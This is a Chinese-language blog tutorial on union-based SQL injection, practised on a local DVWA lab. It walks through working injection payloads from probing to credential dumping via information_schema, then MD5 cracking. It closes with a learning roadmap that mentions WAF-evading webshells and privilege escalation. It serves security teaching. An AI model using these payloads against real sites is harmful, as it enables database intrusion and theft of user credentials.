SQL 注入漏洞详解 - Union 注入

SQL 注入漏洞详解 - Union 注入

1)漏洞简介

SQL 注入简介

SQL 注入 ***即是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上*添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询从而进一步得到相应的数据信息。

SQL 注入概念

SQL 注入漏洞 主要形成的原因是在数据交互中,站点针对前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到 SQL 语句中后,被当作 SQL 语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击着可以 通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。图片

SQL 注入攻击流程

第一步:注入点探测

自动方式:使用 Web 漏洞扫描工具,自动进行注入点发现

手动方式:手工构造 sql inject 测试语句进行注入点发现

第二步:信息获取

通过注入点取期望得到的数据。

  1. 环境信息:数据库类型,数据库版本,操作系统版本,用户信息等。
  2. 数据库信息:数据库名,数据表名,表字段名,字段内容(加密内容破解)

第三步:获取权限

获取操作系统权限:通过数据库执行 Shell,上传木马

2)漏洞原理

可以通过网站存在的查询语句进行构造,为此开发者对其伤透了脑筋,漏洞不光是查询,可能还存在与 API、隐藏链接、http 头数据、写入数据等。需要对数据包的结构和传递函数比较了解,建议学习的时候把数据库的日志打开,就可以查看到传递到数据库的语句是什么样子的了。需要记住的 information_schema 数据库的 SCHEMATA、TABLES、COLUMNS。SCHEMATA 表中存放所有数据库的名,字段名为 SCHEMA_NAME。关键函数 database() 当前数据库名、version() 当前 mysql 版本、user() 当前 mysql 用户。

3)漏洞危害

属于危害较高的漏洞,可以获取敏感信息,修改信息,脱库,上传 Webshell,执行命令。

  1. 参数用户可控:前端传给后端的参数内容是用户可以控制的。( 输入框,URL,抓包 )
  2. 参数带入数据库查询:传入的参数拼接到 SQL 语句,且带入数据库查询。

SQL 注入漏洞 发生在前端,属于前端开发设计漏洞。该漏洞与后端数据库执行无关。

SQL 注入被广泛用于非法入侵网站服务器,获取网站控制权。它是应用层上的一种安全漏洞。

通常在设计存在缺陷的程序中,对用户输入的数据没有做好过滤,导致恶意用户可以构造一些 SQL 语句让服务器去执行,从而导致数据库中的数据被窃取,篡改,删除,以及进一步导致服务器被入侵等危害。

环境准备

docker pull sagikazarmark/dvwa
docker run -d --name dvwa -p 8081:80 -p 33060:3306 sagikazarmark/dvwa

图片image.png

docker exec -it dvwa /bin/bash

图片image.png

show databases;
  • information_schema:可用来访问数据库的元数据,相似于信息数据库。其中保存着 关于MySQL 服务器 所维护的所有其他数据库的信息(元数据)。如数据库名,数据库的表,表栏的数据类型与访问权限等。

4)SQL 注入分类

4.1)数字型

当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。

测试步骤:
1. 加单引号, URL:www.text.com/text.php?id=3'
对应的 sql: select * from table where id=3' 这时 sql 语句出错, 程序无法正常从数据库中查询出数据, 就会抛出异常; 此时可以判断大概率存在注入, 因为只有服务器将这个单引号一起当作 SQL 语句执行时才会报错.

2. 加 and 1=1, URL: www.text.com/text.php?id=3 and 1=1
对应的 sql: select * from table where id=3 and 1=1 语句执行正常, 与原始页面无任何差异;

3. 加 and 1=2, URL: www.text.com/text.php?id=3 and 1=2
对应的 sql: select * from table where id=3 and 1=2 语句可以正常执行, 但是无法查询出结果, 所以返回数据与原始网页存在差异.
  1. 单引号测试
SELECT first_name, last_name FROM users WHERE user_id = '1'';

图片图片

  1. and 1=1 测试

如下查询到数据的状况:存在两种情况。

  1. **有引号:网站把输入的 1 and 1=1 当成字符串 传递到后端,因隐式转换的存在,所以查询出结果。
  2. **无引号:网站识别了输入的 and 1=1做了逻辑判断。所以能查询出结果。存在 SQL 注入。
SELECT first_name, last_name FROM users WHERE user_id = '1 and 1=1';

图片图片

  1. and 1=2 测试

成功返回结果,说明输入的内容是被 当成了字符串执行(隐式转换)。**并未做逻辑运算。**如果做了逻辑运算,则存在 SQL 注入漏洞。

SELECT first_name, last_name FROM users WHERE user_id = '1 and 1=2';

图片图片

  1. 未做隐式转换的效果
SELECT first_name, last_name FROM users WHERE user_id = 1 and 1=1;
SELECT first_name, last_name FROM users WHERE user_id = 1 and 1=2;

图片image.png

如果满足以上三点,则可以判断该 URL 存在数字型注入。


4.2)字符型

当输入的参数为字符串时,**称为字符型。**字符型和数字型最大的一个区别在于,**数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。**数字型语句:select * from table where id =3;字符型如下:select * from table where name='admin';

因此,在构造 Payload 时 通过闭合单引号 可以成功执行语句:实现了绕过被单引号包含的结局

尝试输入: 1' and 1=1 #
# 基于这种方法: 实现了绕过被单引号包含的结局
# 实现了在 SQL 语句层面, 输入的内容是两个正常的表达式.
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1 #';

图片图片图片图片

可以判断为:字符型注入,对参数 id 没有做任何过滤,并且用单引号闭合。

因为条件 1=1 永远为真( 恒为真 ) 所以 where 查询不再限制只返回特定 user_id 的记录,**而是返回整个表的内容。 **

# 理想效果
SELECT first_name,last_name FROM users WHERE user_id = 'suibianxie' or 1=1;

# 闭合单引号
SELECT first_name,last_name FROM users WHERE user_id = 'suibianxie' or 1=1 #';

图片图片图片

4.3)Union 注入 ( 联合查询注入 )

联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合到一起,使用 UNION 或 UNION ALL。注意:UNION 操作符选取不重复的值。如果允许重复的值,请使用 UNION ALL

select user_id,first_name from users where user_id=1 union all select user_id,first_name from users where user_id=1;

图片image.png

select user_id,first_name from users where user_id=1 union select user_id,first_name from users where user_id=1;

图片image.png

推荐使用 UNION ALL,因为 UNION 会自动过滤掉字段内容重复的数据,这可能导致我们错过想查找的相关数据内容。

前提条件:页面存在显示位

MySQL 5.0 以上版本,存在一个自带的数据库名为:information_schema(重点)

information_schema 数据库中 **有三个表 **非常重要

  1. schemata:表里包含所有数据库的名字
  2. tables:表里包含所有数据库的所有表名,默认字段为 table_name
  3. columns:表里包含所有数据库的所有表的所有字段名

三个列 非常重要

  • SCHEMA_NAME:数据库名
  • TABLE_NAME:表名
  • COLUMN_NAME:字段名
# 爆库名
select database();
select SCHEMA_NAME from information_schema.schemata;
select group_concat(SCHEMA_NAME) from information_schema.schemata;

# 爆表名
select TABLE_NAME from information_schema.tables where table_schema='dvwa';
select group_concat(TABLE_NAME) from information_schema.tables where table_schema='dvwa';

# 爆列名
select COLUMN_NAME from information_schema.columns where TABLE_NAME='users';
select group_concat(COLUMN_NAME) from information_schema.columns where TABLE_NAME='users';

图片image.png

联合注入的过程:

  1. 判断注入点
  2. 判断是整型还是字符型
  3. 判断列数、判断显示位
  4. 获取所有数据库名
  5. 获取数据库所有表名、字段名、字段中的数据重

判断 列数、判断 显示位通过 order by**得知输出的结果有几列图片

  1. 通过 order by判断列数
# 正常
1' order by 2#

图片图片

  1. 通过 union all判断显示位

判断 select 查询语句的 **字段个数 **信息,用于与后边联合查询数量做匹配

# 确定显示位
1' union all select 1,2#

图片图片

1' union all select 1,2,3#

图片image.png

  1. 爆出 **数据库名 **和 版本信息

select database() 获得当前数据库名称

# 爆出数据库名和版本信息
1' union all select database(),version()#

图片图片

基于 group_concat 函数是一个非常实用的聚合函数**用于在分组查询中将同一组内的多个值合并为一个字符串

select group_concat(first_name) from users;

图片image.png

  1. 爆出 dvwa 数据库中的 数据表
# 爆出 dvwa 数据库中有 guestbook,users 两个表
1' union select 1,table_name from information_schema.tables where table_schema ='dvwa'#

# 加 group_concat() 函数
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema ='dvwa'#

图片图片图片图片

  1. 爆出 users 表字段
# 得到 users 表字段信息
1' UNION SELECT 1,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'#

# 加 group_concat() 函数
1' UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'#

图片图片

  1. 最终基于 我们得到的 数据库名称数据库表名数据库字段名

通过 联合查询 过滤到表中的 **用户名 **和 密码信息 ( 数据信息 )

# 得到用户名和密码
1' union select user,password from users#

图片图片

MD5 解密站点( 撞库逻辑原理 )图片图片

大功告成~
学习网络安全技术的方法无非三种:

第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。

第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

第三种就是去找培训。

image.png

接下来,我会教你零基础入门快速入门上手网络安全。

网络安全入门到底是先学编程还是先学计算机基础?这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说,学习编程或者计算机基础对他们来说都有一定的难度,并且花费时间太长。

第一阶段:基础准备 4周~6周

这个阶段是所有准备进入安全行业必学的部分,俗话说:基础不劳,地动山摇
image.png

第二阶段:web渗透

学习基础 时间:1周 ~ 2周:

① 了解基本概念:(SQL注入、XSS、上传、CSRF、一句话木马、等)为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透,学一学案例的思路,每一个站点都不一样,所以思路是主要的。
③ 学会提问的艺术,如果遇到不懂得要善于提问。
image.png

配置渗透环境 时间:3周 ~ 4周:

① 了解渗透测试常用的工具,例如(AWVS、SQLMAP、NMAP、BURP、中国菜刀等)。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。

渗透实战操作 时间:约6周:

① 在网上搜索渗透实战案例,深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试,推荐DWVA,SQLi-labs,Upload-labs,bWAPP。
③ 懂得渗透测试的阶段,每一个阶段需要做那些动作:例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入,寻找绕过waf的方法,制作自己的脚本。
⑤ 研究文件上传的原理,如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用(IIS、Nignix、Apache)等,参照:上传攻击框架。
⑥ 了解XSS形成原理和种类,在DWVA中进行实践,使用一个含有XSS漏洞的cms,安装安全狗等进行测试。
⑦ 了解一句话木马,并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限,Google关键词:提权
image.png
以上就是入门阶段

第三阶段:进阶

已经入门并且找到工作之后又该怎么进阶?详情看下图
image.png

给新手小白的入门建议:
新手入门学习最好还是从视频入手进行学习,视频的浅显易懂相比起晦涩的文字而言更容易吸收,这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦!

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值